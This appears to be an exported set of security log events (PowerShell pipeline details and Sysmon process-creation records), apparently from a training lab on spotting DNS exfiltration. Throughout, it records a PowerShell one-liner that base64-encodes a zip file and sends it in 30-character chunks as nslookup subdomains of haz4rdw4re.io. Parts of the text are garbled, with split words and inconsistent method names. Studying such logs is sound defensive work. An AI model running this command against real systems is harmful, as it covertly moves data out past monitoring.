"Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup IAAgCUAAA tQAAAAAA.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup IAAgCUAAAAtQAAAAAA.haz4 rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989     source = eventcollector sourcetype = _json



## Time

## Event

```

ere-Object): name="InputObject"; value="AdAAAAHQAAA
EludmVzdG9yUHJlc2Vu"ParameterBinding(ForEach-Objec
t): name="InputObject"; value="AdAAAAHQAAAEEludmVzdG
9yUHJlc2Vu"ParameterBinding(Where-Object): name="In
putObject"; value=""ParameterBinding(Where-Object):
name="InputObject"; value="dGF0aW9uMjAyMy5wcHR488wr
Sy0uyS"ParameterBinding(ForEach-Object): name="Inpu
tObject"; value="dGF0aW9uMjAyMy5wcHR488wrSy0uyS"Par
ameterBinding(Where-Object): name="InputObject"; va
lue=""ParameterBinding(Where-Object): name="InputOb
ject"; value="8KKEotTs0rSSzJzM8zMjAy1isoKKkA"Param
eterBinding(ForEach-Object): name="InputObject"; val
ue="8KKEotTs0rSSzJzM8zMjAy1isoKKkA"ParameterBindi
ng(Where-Object): name="InputObject"; value=""Paramet
erBinding(Where-Object): name="InputObject"; value
="AFBLAQIUABQAAAIAANigL1fVU3cDIg"ParameterBinding(F
orEach-Object): name="InputObject"; value="AFBLAQIU
ABQAAAIAANigL1fVU3cDIg"ParameterBinding(Where-Objec
t): name="InputObject"; value=""ParameterBinding(Wh
ere-Object): name="InputObject"; value="AAA18AAAAbA
AAAAAAAAAAAAAAA"ParameterBinding(ForEach-Objec
t): name="InputObject"; value="AAA18AAAAbAAAAAAA
AAAAAAA"ParameterBinding(Where-Object): name="In
putObject"; value=""ParameterBinding(Where-Object):
name="InputObject"; value="AABDbG11bnRQb3J0Zm9saW9T
dW1tYX"ParameterBinding(ForEach-Object): name="Inpu
tObject"; value="AABDbG11bnRQb3J0Zm9saW9TdW1tYX"Par
ameterBinding(Where-Object): name="InputObject"; va
lue=""ParameterBinding(Where-Object): name="InputOb
ject"; value="J5LnhsC3hQSwECFAAUAAAAC9oC5X"Param
eterBinding(ForEach-Object): name="InputObject"; val
ue="J5LnhsC3hQSwECFAAUAAAAC9oC5X"ParameterBindi
ng(Where-Object): name="InputObject"; value=""Paramet
erBinding(Where-Object): name="InputObject"; value
="Hh105R8AAAAdAAAAHQAAAAAAA"ParameterBinding(F
orEach-Object): name="InputObject"; value="Hh105R8A
AAAdAAAAHQAAAAAAA"ParameterBinding(Where-Objec
t): name="InputObject"; value=""ParameterBinding(Wh
ere-Object): name="InputObject"; value="AAAABbAAAAS
W52ZXN0b3JQcmVzZW50"ParameterBinding(ForEach-Objec
t): name="InputObject"; value="AAAABbAAAASW52ZXN0b3
JQcmVzZW50"ParameterBinding(Where-Object): name="In
putObject"; value=""ParameterBinding(Where-Object):
name="InputObject"; value="YXRpb24yMDIzLnBwdHhQSwUG
AAAAAA"ParameterBinding(ForEach-Object): name="Inpu
tObject"; value="YXRpb24yMDIzLnBwdHhQSwUGAAAAAA"Par
ameterBinding(Where-Object): name="InputObject"; va
lue=""ParameterBinding(Where-Object): name="InputOb
ject"; value="IAAgCUAAAAtQAAAAA"ParameterBinding(F
orEach-Object): name="InputObject"; value="IAAgCUAA
AAtQAAAAA"ParameterBinding(Where-Object): name="In
putObject"; value="""
powershell.command.invocation_details.value: "Wh
ere-Object", "$_ -ne ''", "ForEach-Object", "Invo
ke-Expression "nslookup $_.haz4rdw4re.io""", "", "UE
sDBBQAAAIAANigL1fVU3cDIgAAAI", "UEsDBBQAAAIAANigL1f
VU3cDIgAAAI", "", "8AAAAbAAAQ2xpZW50UG9ydGZvbGlv",

```

Time Event  
"8AAAAAbAAAAQ2xpZW50UG9ydGZvbGlv", "", "U3VtbWFyeS54bhn4c87JTM0rCcgvKk", "U3VtbWFyeS54bhn4c87JTM0rCcgvKk", "", "nLz8nMDy7NzU0sqtSryCmu40Vyprsk", "nLz8nMDy7NzU0sqtSryCmu40Vyprsk", "", "AFBLAwQUAAAACAC9oC5XHh105R8AAA", "AFBLAwQUAAAACAC9oC5XHh105R8AAA", "", "AdAAAAHQAAAE1udmVzdG9yUHJ1c2Vu", "AdAAAAHQAAAE1udmVzdG9yUHJ1c2Vu", "", "dGF0aW9uMjAyMy5wcHR488wrSy0uyS", "dGF0aW9uMjAyMy5wcHR488wrSy0uyS", "", "8KKEotTs0rSSzJzM8zMjAy1isoKKKA", "8KKEotTs0rSSzJzM8zMjAy1isoKKKA", "", "AFBLAQIUABQAAAIAANigL1fVU3cDl", "AFBLAQIUABQAAAIAANigL1fVU3cDl", "", "AAAI8AAAAbAAAAAAA", "AAAI8AAAAbAAAAAAA", "", "AABDbG11bnRQb3J0Zm9saW9Tdw1tYX", "AABDbG11bnRQb3J0Zm9saW9Tdw1tYX", "", "J5Lnhsc3hQSwECFAUAAAAC9oC5X", "J5Lnhsc3hQSwECFAUAAAAC9oC5X", "", "Hh105R8AAAAdAAAHQAAAAAAA", "Hh105R8AAAAdAAAHQAAAAAAA", "", "AAAAbAAAASW52ZXN0b3JQcmVzZW50", "AAAAbAAAASW52ZXN0b3JQcmVzZW50", "", "YXRpb24yMDIzLnBwdHhQSwUGAAAAA", "YXRpb24yMDIzLnBwdHhQSwUGAAAAA", "", "IAAgCUAAAAtQAAAAAA", "IAAgCUAAAAtQAAAAAA", ""  
**powershell.command.name:** -  
**powershell.file.script\_block\_text:** -  
**process.command\_line:** C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass  
**timestamp:** 01/11/2026 15:28:07.633  
**winlog.process.pid:** -  
}  
Show as raw text  
host = 10.10.67.0:8989 | source = eventcollector | sourcetype = \_json

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"}. Context Information:     DetailSequence=1     DetailTotal=1     SequenceNumber=459     UserId=SSF\michael.ascot     HostName=ConsoleHost     HostVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-98b9-9193fdb89041     HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass     EngineVersion=5.1.20348.1366     RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd8280     PipelineId=53     ScriptName=     CommandLine=\$base64 = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"} Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"ParameterBinding(Invoke-Expression): name="Command"; value="nslookup Hh105R8AAAAdAAAAHQAAAAAAAAAA.haz4rdw4re.io" powershell.command.invocation_details.value: "Invoke-Expression", "nslookup Hh105R8AAAAdAAAAHQAAAAAAAAA.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToString([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information: DetailSeque nce=1 DetailTotal=1 SequenceNumber=457 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=53 ScriptName= CommandLine =\$base64 = [System.Convert]::ToString([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup J5Lnhsc3hQ SwECFAAUAAAACAC9oC5X.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup J5Lnhsc3hQSwECFAAUAAAAC AC9oC5X.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:                   DetailSeque nce=1   DetailTotal=1   SequenceNumber=463        Use rId=SSF\michael.ascot   HostName=ConsoleHost    Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041            HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass    EngineVersion=5.1.20348.136 6           RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280      PipelineId=53    ScriptName=        CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup YXRpb24yMD IzLnBwdHhQSwUGAAAAAA.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup YXRpb24yMDIzLnBwdHhQSwU GAAAAAA.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989     source = eventcollector sourcetype = _json

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToStringBase64String([System.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"}. Context Information: DetailSequence=1 DetailTotal=1 SequenceNumber=451 Use rId=SSF\michael.ascot HostName=ConsoleHost HostVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-98b9-9193fdb89041 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass EngineVersion=5.1.20348.1366 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd8280 PipelineId=53 ScriptName= CommandLine =\$base64 = [System.Convert]::ToStringBase64String([System.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"}. Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"ParameterBinding(Invoke-Expression): name="Command"; value="nslookup AFBLAQIUABQAAAIANigLlfVU3cDIg.haz4rdw4re.io" powershell.command.invocation_details.value: "Invoke-Expression", "nslookup AFBLAQIUABQAAAIANigLlfVU3cDIg.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:                   DetailSeque nce=1   DetailTotal=1   SequenceNumber=449        Use rId=SSF\michael.ascot   HostName=ConsoleHost    Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041            HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass    EngineVersion=5.1.20348.136 6           RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280      PipelineId=53    ScriptName=        CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expres sion): "Invoke-Expression"ParameterBinding(Invoke-Exp ression): name="Command"; value="nslookup 8KKEotTs0r SSzJzM8zMjAy1isoKKkA.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup 8KKEotTs0rSSzJzM8zMjAy1 isoKKkA.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989     source = eventcollector sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" nLz8nMDy7NzU0sqtSryCmu40Vyprsk.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 3800 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\exfiltration\ <b>timestamp</b> : 01/11/2026 15:28:06.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:28:06.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" AFBLAwQUAAAACAC9oC5XHh105R8AAA.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 6604 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\exfiltration\ <b>timestamp</b> : 01/11/2026 15:28:06.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" AdAAAAHQAAAEIudmVzdG9yUHJlc2Vu.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 5704 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\exfiltration\ <b>timestamp</b> : 01/11/2026 15:28:06.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:28:06.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" U3VtbWFyeS54bHN4c87JTM0rCcgvKk.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 5432 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\exfiltration\ <b>timestamp</b> : 01/11/2026 15:28:06.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information: DetailSeque nce=1 DetailTotal=1 SequenceNumber=445 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=53 ScriptName= CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expres sion): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AdAAAAHQAA AEIudmVzdG9yUHJlc2Vu.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup AdAAAAHQAAAEIudmVzdG9yU HJlc2Vu.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:06.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" 8AAAbAAAQ2xpZW50UG9ydGZvbG1v.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 3952 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\exfiltration\ <b>timestamp</b> : 01/11/2026 15:28:06.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information: DetailSeque nce=1 DetailTotal=1 SequenceNumber=441 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=53 ScriptName= CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup nLz8nMDy7N zU0sqtSryCmu40Vyprsk.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup nLz8nMDy7NzU0sqtSryCmu4 0Vyprsk.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:06.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information: DetailSeque nce=1 DetailTotal=1 SequenceNumber=435 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=53 ScriptName= CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup UEsDBBQAA AIANigL1fVU3cDIgAAAI.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup UEsDBBQAAAIANigL1fVU3c DIgAAAI.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:06.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" 8KKEotTs0rSSzJzM8zMjAy1isoKKkA.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 4752 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\exfiltration\ <b>timestamp</b> : 01/11/2026 15:28:06.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:06.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToString([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information: DetailSeque nce=1 DetailTotal=1 SequenceNumber=443 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=53 ScriptName= CommandLine =\$base64 = [System.Convert]::ToString([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AFBLAwQUAA AACAC9oC5XHh1O5R8AAA.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup AFBLAwQUAAACAC9oC5XHh1 O5R8AAA.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:06.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector sourcetype = _json